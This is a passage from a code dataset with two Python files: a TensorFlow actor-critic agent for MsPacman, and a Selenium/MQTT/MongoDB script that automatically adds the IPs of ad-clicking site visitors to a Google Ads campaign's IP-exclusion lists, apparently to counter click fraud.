random_normal\nfrom tensorflow.keras.regularizers import l2 as l2_regularizer\nfrom tensorflow.layers import batch_normalization\nfrom tensorflow.keras.initializers import glorot_normal as x_init\n#from tensorflow.contrib.layers import xavier_initializer_conv2d as x_init2d\n\n# Number of frames to use to model motion.\nFRAME_SKIP = 4\n# Size of the image to be resized to.\nIMAGE_SHAPE = [84, 84]\n# Size of the image to put in 84x84x4\nINPUT_SHAPE = [*IMAGE_SHAPE, FRAME_SKIP]\n# Number of classes\nNUM_CL = 10\n# The number of times the session will be run for training\nTRAINING_STEPS = 100000\n# 
Number of samples to use on each session iteration\nBATCH_SIZE = 128\n# Regularization constant\nREGULARIZATION_BETA = 0.1\n# Learning rate for some optimizers.\nLEARNING_RATE = 0.0001\n# Number of possible actions the player can make.\nNUM_ACT = 9\n# The discount rate\nGAMMA = 0.95\n# The number of environments to use per training step.\nENV_COUNT = 16\n\ndef process(state, prev):\n\trsize1 = cv2.resize(state, tuple(IMAGE_SHAPE))\n\tgrey1 = cv2.cvtColor(rsize1, cv2.COLOR_RGB2GRAY)\n\trsize2 = cv2.resize(prev, tuple(IMAGE_SHAPE))\n\tgrey2 = cv2.cvtColor(rsize2, cv2.COLOR_RGB2GRAY)\n\treturn np.maximum(grey1, grey2)\n\nclass Env:\n\tdef __init__(self, render=False):\n\t\tself.__env = gym.make('MsPacman-v0')\n\t\tself.__env.frame_skip = 1\n\t\tself.__render = render\n\t\tself.__reset()\n\t\tself.__total_rwrd = 0.0\n\n\t\tif render:\n\t\t\tpygame.init()\n\t\t\tself.__env.render()\n\n\tdef step(self, action):\n\t\tstates = tuple(self.__env.step(action) for _ in range(FRAME_SKIP))\n\t\trwrd = sum(s[1] for s in states)\n\t\tdone = any(s[2] for s in states)\n\t\tself.__total_rwrd += rwrd\n\n\t\t# Handle storing the state, and then form an observation.\n\t\tself.__state.popleft()\n\t\tself.__state.append(process(states[-1][0], states[-2][0]))\n\n\t\t# Render if required.\n\t\tif self.__render:\n\t\t\tself.__env.render()\n\n\t\t# If the game is over, we return an empty state.\n\t\tif done:\n\t\t\tt = self.__total_rwrd\n\t\t\tself.__reset()\n\t\t\treturn (\n\t\t\t\tnp.zeros(INPUT_SHAPE),\n\t\t\t\t-t,\n\t\t\t\tdone)\n\t\telse:\n\t\t\treturn (self.obsv, rwrd, done)\n\n\t@property\n\tdef obsv(self):\n\t\treturn np.reshape(self.__state, INPUT_SHAPE)\n\n\tdef __reset(self):\n\t\ts = self.__env.reset()\n\t\tself.__total_rwrd = 0.0\n\t\tself.__state = deque(process(s, s) for _ in range(FRAME_SKIP))\n\nclass Model:\n\tdef __init__(self):\n\t\tself._model()\n\t\tself._loss_fn()\n\t\tself._train_fn()\n\t\tself.__logger = Model.EpisodicPrint()\n\t\tself.sess = tf.keras.backend.get_session()\n\t\t#self.sess.run(tf.global_variables_initializer())\n\n\tdef _model(self):\n\t\tself.input_layer = tf.keras.layers.Input(shape=INPUT_SHAPE)\n\t\tself.__critic_model(self.input_layer)\n\t\tself.__policy_model(self.input_layer)\n\n\tdef __policy_model(self, input_layer):\n\t\t\"\"\"\n\t\tCreates the operation model for tensorflow.\n\t\t\"\"\"\n\t\tself.__policy_layers = [\n\t\t\ttf.keras.layers.Conv2D(\n\t\t\t\tfilters=32,\n\t\t\t\tkernel_size=[8, 8],\n\t\t\t\tstrides=[4, 4],\n\t\t\t\tkernel_regularizer=l2_regularizer(REGULARIZATION_BETA), \n\t\t\t\tpadding=\"valid\",\n\t\t\t\tkernel_initializer=x_init()),\n\t\t\ttf.keras.layers.BatchNormalization(epsilon=1e-5),\n\t\t\ttf.keras.layers.ELU(),\n\t\t\ttf.keras.layers.Conv2D(\n\t\t\t\tfilters=32,\n\t\t\t\tkernel_size=[8, 8],\n\t\t\t\tstrides=[4, 4],\n\t\t\t\tkernel_regularizer=l2_regularizer(REGULARIZATION_BETA), 
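# --- Aside on process() above: the element-wise max of two consecutive frames
# is the usual Atari de-flicker trick, because sprites drawn on alternating
# frames survive in at least one of the pair. Toy check:
#   a = np.array([[0, 9], [0, 0]])   # sprite only in frame a
#   b = np.array([[0, 0], [7, 0]])   # sprite only in frame b
#   np.maximum(a, b)                 # -> [[0, 9], [7, 0]], both kept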
\n\t\t\t\tpadding=\"valid\",\n\t\t\t\tkernel_initializer=x_init()),\n\t\t\ttf.keras.layers.BatchNormalization(epsilon=1e-5),\n\t\t\ttf.keras.layers.ELU(),\n\t\t\ttf.keras.layers.Flatten(),\n\t\t\ttf.keras.layers.Dense(\n\t\t\t\t500,\n\t\t\t\tkernel_initializer=x_init(),\n\t\t\t\tkernel_regularizer=l2_regularizer(REGULARIZATION_BETA)),\n\t\t\ttf.keras.layers.ELU(),\n\t\t\ttf.keras.layers.Dense(\n\t\t\t\t500,\n\t\t\t\tkernel_initializer=x_init(),\n\t\t\t\tkernel_regularizer=l2_regularizer(REGULARIZATION_BETA)),\n\t\t\ttf.keras.layers.ELU(),\n\t\t\ttf.keras.layers.Dense(\n\t\t\t\tNUM_ACT,\n\t\t\t\tkernel_initializer=x_init(),\n\t\t\t\tkernel_regularizer=l2_regularizer(REGULARIZATION_BETA)),\n\t\t\ttf.keras.layers.Softmax(),\n\t\t]\n\n\t\tout = input_layer\n\t\tfor l in self.__policy_layers:\n\t\t\tout = l(out)\n\n\t\tself.__policy_model = tf.keras.models.Model(\n\t\t\tinputs=input_layer,\n\t\t\toutputs=out)\n\n\t\tself.action = tf.random.categorical(self.__policy_model.output, 1)\n\t\tself.act_eval = tf.keras.backend.function(\n\t\t\tinputs=[self.__policy_model.input],\n\t\t\toutputs=[self.action])\n\n\t\n\tdef __critic_model(self, input_layer):\n\t\t\"\"\"\n\t\tCreates the operation model for tensorflow.\n\t\t\"\"\"\n\t\tself.__critic_layers = [\n\t\t\ttf.keras.layers.Conv2D(\n\t\t\t\tfilters=32,\n\t\t\t\tkernel_size=[8, 8],\n\t\t\t\tstrides=[4, 4],\n\t\t\t\tkernel_regularizer=l2_regularizer(REGULARIZATION_BETA), \n\t\t\t\tpadding=\"valid\",\n\t\t\t\tkernel_initializer=x_init()),\n\t\t\ttf.keras.layers.BatchNormalization(epsilon=1e-5),\n\t\t\ttf.keras.layers.ELU(),\n\t\t\ttf.keras.layers.Conv2D(\n\t\t\t\tfilters=32,\n\t\t\t\tkernel_size=[8, 8],\n\t\t\t\tstrides=[4, 4],\n\t\t\t\tkernel_regularizer=l2_regularizer(REGULARIZATION_BETA), \n\t\t\t\tpadding=\"valid\",\n\t\t\t\tkernel_initializer=x_init()),\n\t\t\ttf.keras.layers.BatchNormalization(epsilon=1e-5),\n\t\t\ttf.keras.layers.ELU(),\n\t\t\ttf.keras.layers.Flatten(),\n\t\t\ttf.keras.layers.Dense(\n\t\t\t\t500,\n\t\t\t\tkernel_initializer=x_init(),\n\t\t\t\tkernel_regularizer=l2_regularizer(REGULARIZATION_BETA)),\n\t\t\ttf.keras.layers.ELU(),\n\t\t\ttf.keras.layers.Dense(\n\t\t\t\t500,\n\t\t\t\tkernel_initializer=x_init(),\n\t\t\t\tkernel_regularizer=l2_regularizer(REGULARIZATION_BETA)),\n\t\t\ttf.keras.layers.ELU(),\n\t\t\ttf.keras.layers.Dense(\n\t\t\t\t1,\n\t\t\t\tkernel_initializer=x_init(),\n\t\t\t\tkernel_regularizer=l2_regularizer(REGULARIZATION_BETA)),\n\t\t]\n\n\t\tout = input_layer\n\t\tfor l in self.__critic_layers:\n\t\t\tout = l(out)\n\n\t\tself.__critic_model = tf.keras.models.Model(\n\t\t\tinputs=input_layer,\n\t\t\toutputs=out)\n\n\t\tself.critic_eval = tf.keras.backend.function(\n\t\t\tinputs=[self.__critic_model.input],\n\t\t\toutputs=[out])\n\n\t\t#self.__critic_model = tf.keras.Sequential(self.__critic_layers)\n\n\tdef _loss_fn(self):\n\t\t\"\"\"\n\t\tGets the loss function for training.\n\t\t\"\"\"\n\t\t# The advantage\n\t\tself.rwrd = tf.placeholder(tf.float32, shape=[None])\n\t\tself.fval = tf.placeholder(tf.float32, shape=[None])\n\t\tself.act_choice = tf.placeholder(tf.int64, shape=[None])\n\n\t\tsummand = tf.one_hot(self.act_choice, NUM_ACT)\n\t\tsummand = tf.math.multiply(self.__policy_model.output, summand)\n\t\tsummand = tf.reduce_sum(summand, axis=1)\n\t\t# This maximum step is done to deal with too small\n\t\t# probabilities creating -inf losses, and therefore NaN\n\t\t# variables later on. 
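# --- Observation on the sampling above (not a claim about intent):
# tf.random.categorical expects *unnormalized log-probabilities*, while the
# policy head ends in a Softmax. The log-space form would be
#   action = tf.random.categorical(tf.math.log(probs), 1)
# Feeding probabilities directly still samples, but treats them as logits,
# which flattens the sampled distribution toward uniform.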
This was chosen empirically.\n\t\tsummand = tf.math.log(tf.math.maximum(summand, 1e-30))\n\n\t\tself.policy_loss_fn = tf.reduce_mean(-summand * self.__critic_model.output)\n\n\t\t# Now to define the value loss function\n\t\tself.critic_loss_fn = tf.reduce_sum(\n\t\t\t(self.rwrd + GAMMA * self.fval - self.__critic_model.output)**2)\n\t\t\n\tdef _train_fn(self):\n\t\t\"\"\"\n\t\tConstructs the optimizer.\n\t\t\"\"\"\n\t\tpolicy_train = tf.keras.optimizers.RMSprop(LEARNING_RATE)\n\t\tcritic_train = tf.keras.optimizers.RMSprop(LEARNING_RATE)\n\n\t\tself.policy_train_fn = tf.keras.backend.function(\n\t\t\tinputs=[self.__policy_model.input, self.act_choice],\n\t\t\toutputs=[self.policy_loss_fn],\n\t\t\tupdates=policy_train.get_updates(\n\t\t\t\tparams=self.__policy_model.trainable_weights,\n\t\t\t\tloss=self.policy_loss_fn))\n\n\t\tself.critic_train_fn = tf.keras.backend.function(\n\t\t\tinputs=[self.__critic_model.input, self.rwrd, self.fval],\n\t\t\toutputs=[self.critic_loss_fn],\n\t\t\tupdates=critic_train.get_updates(\n\t\t\t\tparams=self.__critic_model.trainable_weights,\n\t\t\t\tloss=self.critic_loss_fn))\n\n\n\n\tdef train(self):\n\t\tenvs = [Env() for _ in range(ENV_COUNT)]\n\t\tfor step in range(TRAINING_STEPS):\n\t\t\tobsvs = np.stack([e.obsv for e in envs])\n\t\t\tactions = np.reshape(self.act_eval([obsvs])[0], (ENV_COUNT,))\n\n\t\t\t# List of tuples: (state, rwrd, done)\n\t\t\tdata = [e.step(a) for (e, a) in zip(envs, actions)]\n\n\t\t\tloss = self.policy_train_fn([\n\t\t\t\tobsvs,\n\t\t\t\tactions])[0]\n\n\t\t\tadvs = np.reshape(\n\t\t\t\tself.critic_eval([np.stack([e[0] for e in data])])[0],\n\t\t\t\t(ENV_COUNT,))\n\t\t\trwrds = [d[1] for d in data]\n\t\t\tdone = [d[2] for d in data]\n\n\t\t\tloss = self.critic_train_fn([obsvs, rwrds, advs])[0]\n\n\t\t\tself.__logger.handle_data(rwrds, step, done)\n\n\n\tdef evaluate(self):\n\t\tenv = Env(render=True)\n\t\tlast = time.time()\n\t\tdone = False\n\t\treward = 0.0\n\t\twhile not done:\n\t\t\tt = time.time()\n\t\t\tif t - last >= 0.064:\n\t\t\t\taction = self.act_eval([np.reshape(env.obsv, (1, *INPUT_SHAPE))])[0]\n\t\t\t\t(_, r, done) = env.step(action)\t\t\n\t\t\t\treward += r\n\t\t\t\tlast = time.time()\n\t\tprint(\"Total Evaluation Reward: {}\".format(reward))\n\n\tclass EpisodicPrint:\n\t\tdef __init__(self):\n\t\t\tself.rwrds = [[] for _ in range(ENV_COUNT)]\n\n\t\tdef handle_data(self, rwrd, step, done):\n\t\t\tfor (i, r) in enumerate(rwrd):\n\t\t\t\tif r > 0.0:\n\t\t\t\t\tself.rwrds[i].append(r)\n\n\t\t\tfor (i, d) in enumerate(done):\n\t\t\t\tif d:\n\t\t\t\t\tr = sum(self.rwrds[i])\n\t\t\t\t\tprint(\"Total episodic reward: {}\".format(r))\n\t\t\t\t\tself.rwrds[i].clear()\n\n\n\ndef main(args):\n\tmodel = Model()\n\tmodel.train()\n\tmodel.evaluate()\n\nif __name__ == '__main__':\n\timport sys\n\tmain(sys.argv)","sub_path":"tf_examples/deeprl/actor_critic/mspacman.py","file_name":"mspacman.py","file_ext":"py","file_size_in_byte":9022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"608088842","text":"import pymongo\r\nimport paho.mqtt.client as paho\r\nimport threading\r\nfrom queue import Queue\r\nimport datetime\r\nimport time\r\nfrom tkinter import *\r\nfrom tkinter import BOTH, END, HORIZONTAL, Tk, scrolledtext, ttk\r\nfrom datetime import datetime, timedelta, date, time as dt_time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.support.ui import WebDriverWait\r\nfrom selenium.webdriver.common.keys import Keys\r\nfrom selenium.webdriver.chrome.options import 
Options\r\nfrom constants import login, passw\r\n\r\nroot = Tk()\r\nq = Queue()\r\nq2 = Queue()\r\nq3 = Queue()\r\n# MQTT Setting\r\nbroker = \"192.168.1.231\"\r\nTopics = [(\"url\",0), (\"date\",0), (\"time\",0), (\"IP\",0), (\"page\",0), (\"site\",0), (\"brouser\",0)]\r\n# Mongo Setting\r\nmyclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\r\nmydatabase = myclient[\"tvremont\"]\r\nmycol = mydatabase[\"tvrem\"]\r\nmycol_tvremNotGoogl = mydatabase[\"tvremNotGoogl\"]\r\nmycol_tvremBanedForever = mydatabase[\"tvremBanedForever\"]\r\nmycol_tvremBanedToday = mydatabase[\"tvremBanedToday\"]\r\n# Goodl Setting\r\nurlLogin = 'https://accounts.google.com/signin'\r\nurlCompany = \"https://ads.google.com/aw/campaigns?ocid=64763724&__c=3808221676&__u=4249769236&authuser=0&__o=cues&lang=uk&loc=21125&device=30001\"\r\nurlTel = 'https://ads.google.com/aw/settings/campaign/search?campaignId=98795004&ocid=64763724&__c=3808221676&__u=4249769236&authuser=0&__o=cues&lang=uk&loc=21125&device=30001'\r\nurlTelRu = 'https://ads.google.com/aw/settings/campaign/search?campaignId=1699363337&ocid=64763724&__c=3808221676&__u=4249769236&authuser=0&__o=cues&lang=uk&loc=21125&device=30001'\r\nurlTelRu49 = 'https://ads.google.com/aw/settings/campaign/search?campaignId=1636077101&ocid=64763724&__c=3808221676&__u=4249769236&authuser=0&__o=cues&lang=uk&loc=21125&device=30001'\r\nurlTelRu39 = 'https://ads.google.com/aw/settings/campaign/search?campaignId=2001143663&ocid=64763724&__c=3808221676&__u=4249769236&authuser=0&__o=cues&lang=uk&loc=21125&device=30001'\r\nurlTelOpt39 = 'https://ads.google.com/aw/settings/campaign/search?campaignId=1825915186&ocid=64763724&__c=3808221676&__u=4249769236&authuser=0&__o=cues&lang=uk&loc=21125&device=30001'\r\nurlTelOpt49 = 'https://ads.google.com/aw/settings/campaign/search?campaignId=1740531111&ocid=64763724&__c=3808221676&__u=4249769236&authuser=0&__o=cues&lang=uk&loc=21125&device=30001'\r\nurlTelOpt34 = 'https://ads.google.com/aw/settings/campaign/search?campaignId=1742888292&ocid=64763724&__c=3808221676&__u=4249769236&authuser=0&__o=cues&lang=uk&loc=21125&device=30001'\r\nurlKomRu43 = 'https://ads.google.com/aw/settings/campaign/search?campaignId=1620167217&ocid=64763724&__c=3808221676&__u=4249769236&authuser=0&__o=cues&lang=uk&loc=21125&device=30001'\r\nurlKomRu39 = 'https://ads.google.com/aw/settings/campaign/search?campaignId=1735226790&ocid=64763724&__c=3808221676&__u=4249769236&authuser=0&__o=cues&lang=uk&loc=21125&device=30001'\r\nurlKomOpt39 = 'https://ads.google.com/aw/settings/campaign/search?campaignId=1643384377&ocid=64763724&__c=3808221676&__u=4249769236&authuser=0&__o=cues&lang=uk&loc=21125&device=30001'\r\nurlKomRu34 = 'https://ads.google.com/aw/settings/campaign/search?campaignId=1644471505&ocid=64763724&__c=3808221676&__u=4249769236&authuser=0&__o=cues&lang=uk&loc=21125&device=30001'\r\nurlKomOpt34 = 'https://ads.google.com/aw/settings/campaign/search?campaignId=1619439315&ocid=64763724&__c=3808221676&__u=4249769236&authuser=0&__o=cues&lang=uk&loc=21125&device=30001'\r\nurlTelDict = {'телеф_34_опт': urlTelOpt34, 'телеф_49_опт': urlTelOpt49, 'телеф_39_опт': urlTelOpt39,'телеф_49_ручн': urlTelRu49,'телеф_39_ручн': urlTelRu39, 'телеф': urlTel, 'телеф_ручн': urlTelRu}\r\nurlKomDict = {'комп_34_ручн': urlKomRu34, 'комп_34_опт': urlKomOpt34, 'комп_39_ручн': urlKomRu39, 'комп_43_ручн': urlKomRu43, 'комп_39_ опт': urlKomOpt39}\r\nxpathLogEmail = \"//*[@id='Email']\"\r\nxpathLogEmailBtn = \"//*[@id='next']\"\r\nxpathLogPassw = 
\"//*[@id='Passwd']\"\r\nxpathLogPasswBtn = \"//*[@id='signIn']\"\r\nxpathSetting = \"//*[@id='cmExtensionPoint-id']//material-button//span\"\r\nxpathTextArea = \"//*[@id='cmExtensionPoint-id']//textarea\"\r\nxpathBanIP = \"//*[@id='cmExtensionPoint-id']//ip-exclusions/material-expansionpanel\"\r\nxpathSave = \"//*[@id='cmExtensionPoint-id']//ip-exclusions/material-expansionpanel//material-yes-no-buttons/material-button[1]/material-ripple\"\r\nxpathCancel = \"//*[@id='cmExtensionPoint-id']//ip-exclusions/material-expansionpanel//material-yes-no-buttons/material-button[2]/material-ripple\"\r\nxpathTableRow1 = \"//*[@id='cmExtensionPoint-id']//div[2]//a\"\r\nxpathTableRow2 = \"//*[@id='cmExtensionPoint-id']//div[3]//a\"\r\nxpathTableRow3 = \"//*[@id='cmExtensionPoint-id']//div[4]//a\"\r\nxpathTableRow4 = \"//*[@id='cmExtensionPoint-id']//div[5]//a\"\r\n#xpathSave = \"//*[@id='cmExtensionPoint-id']//material-button[1]/material-ripple\"\r\n#xpathCancel = \"//*[@id='cmExtensionPoint-id']//material-button[2]/material-ripple\"\r\ndef initAndLogin():\r\n driver.set_window_size(500, 700)\r\n driver.get(urlLogin)\r\n elem = WebDriverWait(driver, 10).until(lambda driver : driver.find_elements_by_id(\"identifierId\"))\r\n elem[0].send_keys(login)\r\n# driver.find_element_by_xpath(\"//*[@id='identifierNext']/content/span\").click()\r\n driver.find_element_by_xpath(\"// *[ @ id = 'identifierNext'] / span / span\").click()\r\n time.sleep(4)\r\n elem = WebDriverWait(driver, 10).until(lambda driver : driver.find_element_by_xpath(\"//*[@id='password']//input\"))\r\n elem.send_keys(passw)\r\n# driver.find_element_by_xpath(\"//*[@id='passwordNext']/content/span\").click()\r\n driver.find_element_by_xpath(\"// *[ @ id = 'passwordNext'] / span / span\").click()\r\n time.sleep(25)\r\n # while inputValue != 1:\r\n # labelConsole['text'] = \"Нажми Login\"\r\n # time.sleep(2)\r\n cookie = {'name': 'foo', 'value': 'bar'}\r\n driver.add_cookie(cookie)\r\n all_cookies = driver.get_cookies()\r\n# print(\"Login OK\")\r\n labelConsole['text'] = \"Login OK\"\r\n\r\ndef openSetting(URL):\r\n driver.get(URL)\r\n try:\r\n WebDriverWait(driver, 20).until(lambda driver : driver.find_element_by_xpath(xpathSetting))\r\n# print(\"open Setting URL OK!\")\r\n labelConsole['text'] = \"open Setting URL OK!\"\r\n except Exception as e:\r\n# print(\"wait\",e)\r\n labelConsole['text'] = \"wait\",e\r\n finally:\r\n print(\"finaly\")\r\n labelConsole['text'] = \"finaly\"\r\n # print('open Url OK')\r\n # нажимаем Дополнительные настройки\r\n WebDriverWait(driver, 15).until(lambda driver : driver.find_element_by_xpath(xpathSetting)).click()\r\n # нажимает Исключение IP адресов\r\n print(1)\r\n WebDriverWait(driver, 10).until(lambda driver : driver.find_element_by_xpath(xpathBanIP)).click()\r\n # Список IP\r\n textArea = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_xpath(xpathTextArea))\r\n# print(\"add IP 1\")\r\n print(2)\r\n textArea.send_keys(Keys.ENTER)\r\n# textArea.send_keys('37.73.241.179')\r\n print(3)\r\n driver.find_element_by_xpath(xpathCancel).click() # кликаем Отмена\r\n labelConsole['text'] = \"openSetting() OK\"\r\n# print(\"openSetting() OK\")\r\n\r\ndef changeURL(URL):\r\n driver.get(URL)\r\n try:\r\n WebDriverWait(driver, 20).until(lambda driver : driver.find_element_by_xpath(xpathSetting))\r\n# print(\"open Setting URL OK!\")\r\n labelConsole['text'] = \"open Setting URL OK!\"\r\n except Exception as e:\r\n# print(\"wait\",e)\r\n labelConsole['text'] = \"wait\",e\r\n finally:\r\n 
print(\"finaly\")\r\n labelConsole['text'] = \"finaly\"\r\n # print('open Url OK')\r\n # нажимаем Дополнительные настройки\r\n WebDriverWait(driver, 15).until(lambda driver : driver.find_element_by_xpath(xpathSetting)).click()\r\n\r\n\r\ndef add_Ban_IP():\r\n try:\r\n driver.find_element_by_xpath(xpathSave).size['width'] != 0 # Проверка на наличие кнопки Сохранить\r\n print(\"кнопка Сохранить\", driver.find_element_by_xpath(xpathSave).size['width'])\r\n driver.find_element_by_xpath(xpathSave).click() # Усли есть, то кликнуть\r\n except:\r\n labelConsole['text'] = \"OK\"\r\n # нажимает Исключение IP адресов\r\n WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_xpath(xpathBanIP)).click()\r\n# print(\"click Ban IP\")\r\n textArea = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_xpath(xpathTextArea))\r\n# print(\"finded TextArea\")\r\n textArea.send_keys(Keys.ENTER) # идём в конец списка\r\n textArea.send_keys(IP) # вводим IP\r\n# print(\"add IP\")\r\n WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_xpath(xpathSave)).click() # кликаем Сохранить\r\n labelConsole['text'] = \"IP is added\"\r\n# print(\"IP is added\")\r\n\r\ndef on_message(client, userdata, message):\r\n if message.topic==\"url\":\r\n global url\r\n url=(str(message.payload.decode(\"utf-8\")))\r\n elif message.topic==\"date\":\r\n global date\r\n date=(str(message.payload.decode(\"utf-8\")))\r\n elif message.topic==\"time\":\r\n global time\r\n time=(str(message.payload.decode(\"utf-8\")))\r\n elif message.topic==\"IP\":\r\n global IP\r\n IP=(str(message.payload.decode(\"utf-8\")))\r\n elif message.topic==\"page\":\r\n global page\r\n page=(str(message.payload.decode(\"utf-8\")))\r\n elif message.topic==\"site\":\r\n global site\r\n site=(str(message.payload.decode(\"utf-8\")))\r\n elif message.topic==\"name\":\r\n global name\r\n name=(str(message.payload.decode(\"utf-8\")))\r\n print(name)\r\n elif message.topic==\"comment\":\r\n global comment\r\n comment=(str(message.payload.decode(\"utf-8\")))\r\n print(comment)\r\n elif message.topic==\"brouser\":\r\n global brouser\r\n brouser=(str(message.payload.decode(\"utf-8\")))\r\n mydict = {\"IP\": IP, \"time\": time, \"date\":date, \"url\": url, \"page\": page, \"site\": site, \"brouser\": brouser }\r\n q.put(mydict) # очередь для worker\r\n\r\ndef worker(): # обработка пришедших с сервера данных о посетителях сайта\r\n while worker_flag:\r\n # if (now.strftime(\"%H\") >= \"22\"):\r\n # mycol_tvremBanedToday.drop()\r\n # print(\"mycol_tvremBanedToday drop\")\r\n while not q.empty():\r\n mydict = q.get()\r\n if mydict is None:\r\n continue\r\n try:\r\n count_repit_brouser = 0\r\n count_repit_ip = 0\r\n brouser = mydict[\"brouser\"]\r\n IP = mydict[\"IP\"]\r\n find_url = str(mydict[\"url\"])\r\n br = mycol.find({\"brouser\" : brouser}, {\"repIP\" : 1, \"repBr\": 1, \"IP\": 1, \"date\": 1, \"time\": 1, \"brouser\": 1 })\r\n ip = mycol.find({\"IP\" : IP}, {\"repIP\" : 1, \"repBr\": 1, \"IP\": 1, \"date\": 1, \"time\": 1, \"brouser\": 1 })\r\n request = ['gclid'] # , 'onas'\r\n if any(c in find_url for c in request): # Если пришел из поиска Гугл gclid\r\n q2.put(IP) # передаём в очередь для worker2\r\n q2.put(brouser)\r\n for x in br:\r\n count_repit_brouser = count_repit_brouser + 1 # проверяем есть ли в базе такой brouser и сколько повторов\r\n if (count_repit_brouser >= 1):\r\n mycol.update_one({\"_id\" : x[\"_id\"]}, { \"$set\": {\"repBr\" : count_repit_brouser}})\r\n for y in ip:\r\n count_repit_ip = count_repit_ip + 1 
# check whether this ip is already in the db and how many repeats\r\n                    if (count_repit_ip >= 1):\r\n                        mycol.update_one({\"_id\" : y[\"_id\"]}, { \"$set\": {\"repIP\" : count_repit_ip}})\r\n                print(mydict[\"time\"], \" \", brouser)\r\n                print(\"Repeats =\", count_repit_brouser, \" IP =\", count_repit_ip, IP )\r\n                labelIP['text'] = mydict[\"time\"] + ' Repeats = ' + str(count_repit_brouser) + ' IP = ' + str(count_repit_ip) + ' ' + str(IP)\r\n                scrollTextOut(brouser)\r\n            except Exception as e:\r\n                print(\"problem with logging \",e)\r\n                continue\r\n\r\ndef worker2(): # browser work\r\n    initAndLogin()\r\n    driver.switch_to.window(driver.window_handles[1])\r\n    driver.get(urlCompany)\r\n    row1 = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_xpath(xpathTableRow1))\r\n    row2 = WebDriverWait(driver, 10).until(lambda driver: driver.find_element_by_xpath(xpathTableRow2))\r\n    rows = [row1, row2]\r\n    for row in rows:\r\n        for key in urlKomDict:\r\n            if(row.text == key):\r\n                urlKo = urlKomDict[key]\r\n        for key in urlTelDict:\r\n            if(row.text == key):\r\n                urlTe = urlTelDict[key]\r\n    print(row1.text)\r\n    print(row2.text)\r\n# urlTe = urlTel\r\n# urlKo = urlKomRu39\r\n# initAndLogin()\r\n# print(\"init\")\r\n    labelConsole['text'] = \"init\"\r\n    while worker_flag:\r\n        try:\r\n            labelConsole['text'] = \"tel \" + urlTe\r\n            labelConsole['text'] = \"ko \" + urlKo\r\n            driver.switch_to.window(driver.window_handles[0]) # go back to the first tab (index 0)\r\n            openSetting(urlTe)\r\n            driver.switch_to.window(driver.window_handles[2]) # switch to the third tab (index 2)\r\n            openSetting(urlKo)\r\n            while True:\r\n                if not q3.empty():\r\n                    urlChangeFlag = q3.get() # queue that swaps the active campaign url from the user interface\r\n                    if (urlChangeFlag == \"Tel\"):\r\n                        urlTe = q3.get()\r\n                        driver.switch_to.window(driver.window_handles[0]) # go back to the first tab (index 0)\r\n                        changeURL(urlTe)\r\n                    elif (urlChangeFlag == \"Ko\"):\r\n                        urlKo = q3.get()\r\n                        driver.switch_to.window(\r\n                            driver.window_handles[2]) # switch to the third tab (index 2)\r\n                        changeURL(urlKo)\r\n\r\n                try:\r\n                    while not q2.empty():\r\n                        IP = q2.get()\r\n                        brouser = q2.get()\r\n                        mycol_tvremBanedToday.update_one({\"IP\" : IP}, {\"$set\": {\"IP\": IP}}, upsert = True )\r\n                        brouser_str = str(brouser)\r\n                        request = ['Linux', 'iPhone']\r\n                        if any(c in brouser_str for c in request): # if the visitor came from a phone\r\n                            driver.switch_to.window(driver.window_handles[0])\r\n                            add_Ban_IP()\r\n                        elif (brouser_str.find(\"Windows\") >= 0): # if the visitor came from a desktop\r\n                            driver.switch_to.window(driver.window_handles[2])\r\n                            add_Ban_IP()\r\n                        else: # if it came from who knows what...\r\n                            print(\"X3\")\r\n                except Exception as e:\r\n                    print(\"ER add IP\", e)\r\n                    q2.put(IP) # if adding the IP to the ban list failed, keep it for another attempt\r\n                    q2.put(brouser)\r\n                    labelConsole['text'] = \"break\"\r\n# print(\"break\")\r\n                    break\r\n\r\n        except Exception as e:\r\n            print(3, 'no Advanced settings', e)\r\n            continue\r\n\r\ndef click_btnTel(): # button click handler\r\n    btnTel.config(fg=\"red\") # change the text colour\r\n    btnTelRu.config(fg=\"black\")\r\n    btnTelOpt39.config(fg=\"black\")\r\n    btnTel39.config(fg=\"black\")\r\n    btnTel49.config(fg=\"black\")\r\n    btnTelOpt49.config(fg=\"black\")\r\n    btnTelOpt34.config(fg=\"black\")\r\n    urlTe = urlTel # switch the active campaign url\r\n    urlChangeFlag = \"Tel\"\r\n    q3.put(urlChangeFlag)\r\n    q3.put(urlTe) # hand it to the browser worker\r\ndef click_btnTelRu():\r\n    btnTelRu.config(fg=\"red\")\r\n    
btnTel.config(fg=\"black\")\r\n btnTelOpt39.config(fg=\"black\")\r\n btnTel39.config(fg=\"black\")\r\n btnTel49.config(fg=\"black\")\r\n btnTelOpt49.config(fg=\"black\")\r\n btnTelOpt34.config(fg=\"black\")\r\n urlTe = urlTelRu\r\n urlChangeFlag = \"Tel\"\r\n q3.put(urlChangeFlag)\r\n q3.put(urlTe)\r\ndef click_btnTel49():\r\n btnTel49.config(fg=\"red\")\r\n btnTelOpt49.config(fg=\"black\")\r\n btnTelOpt39.config(fg=\"black\")\r\n btnTel39.config(fg=\"black\")\r\n btnTelRu.config(fg=\"black\")\r\n btnTel.config(fg=\"black\")\r\n btnTelOpt34.config(fg=\"black\")\r\n urlTe = urlTelRu49\r\n urlChangeFlag = \"Tel\"\r\n q3.put(urlChangeFlag)\r\n q3.put(urlTe)\r\ndef click_btnTel39():\r\n btnTel39.config(fg=\"red\")\r\n btnTel49.config(fg=\"black\")\r\n btnTelOpt49.config(fg=\"black\")\r\n btnTelOpt39.config(fg=\"black\")\r\n btnTelRu.config(fg=\"black\")\r\n btnTel.config(fg=\"black\")\r\n btnTelOpt34.config(fg=\"black\")\r\n urlTe = urlTelRu39\r\n urlChangeFlag = \"Tel\"\r\n q3.put(urlChangeFlag)\r\n q3.put(urlTe)\r\ndef click_btnTelOpt49():\r\n btnTelOpt49.config(fg=\"red\")\r\n btnTelOpt39.config(fg=\"black\")\r\n btnTel39.config(fg=\"black\")\r\n btnTelRu.config(fg=\"black\")\r\n btnTel49.config(fg=\"black\")\r\n btnTel.config(fg=\"black\")\r\n btnTelOpt34.config(fg=\"black\")\r\n urlTe = urlTelOpt49\r\n urlChangeFlag = \"Tel\"\r\n q3.put(urlChangeFlag)\r\n 